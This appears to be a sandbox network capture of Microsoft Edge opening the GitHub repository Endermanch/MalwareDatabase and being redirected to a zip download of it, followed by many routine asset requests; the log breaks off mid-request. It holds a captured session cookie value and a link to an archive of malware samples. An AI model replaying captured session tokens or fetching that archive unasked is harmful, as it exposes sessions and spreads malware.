referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: _gh_sess=khjbbUuNbo0OXHs4iEO%2BlZmNwN6ePoDJpEP%2B55fSkTqSKyRs0nuQfO4UUeewljqEqAMb%2FD3sDHCkfIx4N85tolHIGj5H%2FQhVbKW0amKNuHw9UaeKcPYQ%2BfDg5iPOMVYOX4rRa4vSkgrceQe8vDiJm4hIq5fmwMwnUb22JsHUgEQBFhW3QZNSnD31FwP1%2FRGDnd3K3xtIblZC1%2B8VrfjTZJiRZEaAY8xeDUufRihBOsFeM7gelZKecNqtImlP8OMExoVQzUvVs4uJBArPzQ6ZFQ%3D%3D--GvVXCMxa%2B55FfsJ%2B--y85iPPOgVDIcRtvoLPK0yQ%3D%3D
cookie: _octo=GH1.1.664732354.1709220765
cookie: logged_in=no
cookie: preferred_color_mode=light
cookie: tz=UTC
ResponseHTTP/2.0 302
date: Thu, 29 Feb 2024 15:32:56 GMT
content-type: text/html; charset=utf-8
vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
location: https://codeload.github.com/Endermanch/MalwareDatabase/zip/refs/heads/master
cache-control: max-age=0, private
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-frame-options: deny
x-content-type-options: nosniff
x-xss-protection: 0
referrer-policy: no-referrer-when-downgrade
content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/
content-length: 0
x-github-request-id: DE97:126F1E:6046C79:61A3BF3:65E0A3A8
-
Remote address:8.8.8.8:53Requestgithub.githubassets.comIN AResponsegithub.githubassets.comIN A185.199.108.154github.githubassets.comIN A185.199.109.154github.githubassets.comIN A185.199.110.154github.githubassets.comIN A185.199.111.154
-
Remote address:8.8.8.8:53Requestavatars.githubusercontent.comIN AResponseavatars.githubusercontent.comIN A185.199.108.133avatars.githubusercontent.comIN A185.199.109.133avatars.githubusercontent.comIN A185.199.110.133avatars.githubusercontent.comIN A185.199.111.133
-
Remote address:185.199.108.154:443RequestGET /assets/light-0eace2597ca3.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 24 Jan 2024 14:36:35 GMT
etag: 0x8DC1CE9DE118C7E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2673731
x-served-by: cache-iad-kiad7000125-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 82, 98314
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7e624caf2608988e22ab451a5e140202db480812
content-length: 4258
-
Remote address:185.199.108.154:443RequestGET /assets/dark-a167e256da9c.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 24 Jan 2024 14:36:34 GMT
etag: 0x8DC1CE9DD51FA52
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2673731
x-served-by: cache-iad-kiad7000046-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 160, 98748
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 11754f7e1a161c56993377c302a91f9640729d8e
content-length: 4293
-
Remote address:185.199.108.154:443RequestGET /assets/primer-primitives-2ef2a46b27ee.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 31 Jan 2024 22:29:46 GMT
etag: 0x8DC22AC20D7CCBE
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 2473394
x-served-by: cache-iad-kcgs7200165-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 193, 102408
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 847480665a19744c44563ce35ebc399faca1d90e
content-length: 50855
-
Remote address:185.199.108.154:443RequestGET /assets/primer-08e422afeb43.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 16 Feb 2024 19:06:59 GMT
etag: 0x8DC2F2273E3464A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 1099316
x-served-by: cache-iad-kjyo7100159-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 23, 49837
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 8a38087469ffda117d9989f4f157505eda338d2b
content-length: 1715
-
Remote address:185.199.108.154:443RequestGET /assets/global-6a61d5daf002.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 27 Feb 2024 15:32:33 GMT
etag: 0x8DC37A9516B73E3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 168600
x-served-by: cache-iad-kjyo7100111-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 69, 10754
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9429052ea1d850b0a3d15fdc27834420dcdf5aca
content-length: 45118
-
Remote address:185.199.108.154:443RequestGET /assets/github-29c178bef838.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Wed, 28 Feb 2024 19:45:14 GMT
etag: 0x8DC3895C8CD9B39
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 65034
x-served-by: cache-iad-kcgs7200147-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 127, 4702
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 59f1659b25d7717a7ce8f50c1da43d868ad0baed
content-length: 24781
-
Remote address:185.199.108.154:443RequestGET /assets/repository-6247ca238fd4.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Tue, 20 Feb 2024 19:01:12 GMT
etag: 0x8DC32464EB087C6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 753181
x-served-by: cache-iad-kcgs7200156-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 53, 28501
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 47907f53dfc8d6e121c1f0a386e45a50107b53b2
content-length: 5760
-
Remote address:185.199.108.154:443RequestGET /assets/code-6d7b4ef0ea51.css HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: style
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/css
last-modified: Fri, 23 Feb 2024 22:18:23 GMT
etag: 0x8DC34BD59950E24
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 247259
x-served-by: cache-iad-kcgs7200064-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 45, 9431
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: cdd065a152964ac6f34b40e235f055746dc5cd43
content-length: 6321
-
Remote address:185.199.108.154:443RequestGET /assets/wp-runtime-500859bfc7df.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 29 Feb 2024 00:17:05 GMT
etag: 0x8DC38BBC2C7B5B6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 53521
x-served-by: cache-iad-kjyo7100161-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 113, 535
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 5785a2060e6dcc2527f46b61aa887a2b914c1666
content-length: 11397
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB3E93C20
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3801765
x-served-by: cache-iad-kiad7000110-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 19, 99409
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6cfc7fe79b853d3acba53109e463c3c02b6a9e3d
content-length: 9184
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 24 Jan 2024 14:38:04 GMT
etag: 0x8DC1CEA12C0B1F4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3103624
x-served-by: cache-iad-kjyo7100028-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 11, 101229
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 9f2efc6923b2a5d597284bdec7d6227184bd581c
content-length: 4204
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-6a10dd-e66ebda625fb.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-6a10dd-e66ebda625fb.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:36 GMT
etag: 0x8DBD4BAB47FA2C9
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3229452
x-served-by: cache-iad-kiad7000136-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 74, 98295
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 1932bc8ace1993d9f1931155e041c9ba5030b060
content-length: 4849
-
GEThttps://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-479802999bcc.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/ui_packages_failbot_failbot_ts-479802999bcc.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Thu, 22 Feb 2024 16:53:16 GMT
etag: 0x8DC33C6C42AD326
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kjyo7100082-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6281
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: d2ce46b0fff732a30668697bde36c23380caac57
content-length: 3828
-
Remote address:185.199.108.154:443RequestGET /assets/environment-fe7570f3bc38.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Fri, 23 Feb 2024 16:22:11 GMT
etag: 0x8DC348B96A81089
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 85851
x-served-by: cache-iad-kiad7000041-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 27, 6299
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 7556852f2644f2f9bd1d987e854892c45d11312e
content-length: 3684
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB420D672
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4412808
x-served-by: cache-iad-kiad7000063-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 2727, 97894
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 13bd3a5072cf435b5787fd9bc8f2cbd136542045
content-length: 3584
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Wed, 13 Dec 2023 20:04:22 GMT
etag: 0x8DBFC16B2EB2DBF
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 3294263
x-served-by: cache-iad-kcgs7200056-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 87, 98656
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: 6f28afd0a37eded7dc166d22c7fc9861eb205726
content-length: 3555
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/javascript
last-modified: Tue, 24 Oct 2023 17:57:35 GMT
etag: 0x8DBD4BAB3E2183A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
content-encoding: br
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Thu, 29 Feb 2024 15:32:46 GMT
age: 4413791
x-served-by: cache-iad-kjyo7100047-IAD, cache-lcy-eglc8600045-LCY
x-cache: HIT, HIT
x-cache-hits: 1992, 98715
vary: Accept-Encoding
cross-origin-resource-policy: cross-origin
access-control-allow-origin: *
strict-transport-security: max-age=31536000
x-fastly-request-id: fa1047767b812936708212900f5c7f766da7ce75
content-length: 5248
-
GEThttps://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.jsmsedge.exeRemote address:185.199.108.154:443RequestGET /assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.js HTTP/2.0
host: github.githubassets.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://github.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://github.com/Endermanch/MalwareDatabase
accept-encoding: gzip, deflate, br
